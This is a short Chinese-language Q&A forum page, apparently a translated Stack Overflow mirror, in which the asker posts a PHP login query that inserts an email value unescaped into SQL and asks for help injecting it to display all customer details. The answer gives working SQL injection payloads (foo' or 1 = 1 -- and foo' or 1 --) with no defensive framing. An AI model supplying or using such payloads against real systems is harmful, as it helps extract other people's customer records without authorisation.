如何通过SQL注入?

问题描述 投票:0回答:1
mysql_select_db($database_db, $db);
query_user = "SELECT * FROM customers WHERE email = '$login'";
user = mysql_query($query_user, $db) or die(mysql_error());
row_user = mysql_fetch_assoc($user);
totalRows_user = mysql_num_rows($user);

我需要一些帮助,我知道这是可以注入的,我需要在数据库中显示所有客户详细信息。请帮忙。

mysql sql sqlite mysqli sql-injection
1个回答
1
投票

这将起作用:

foo' or 1 = 1 --

或者,因为您正在运行MySQL:

foo' or 1 --
© www.soinside.com 2019 - 2024. All rights reserved.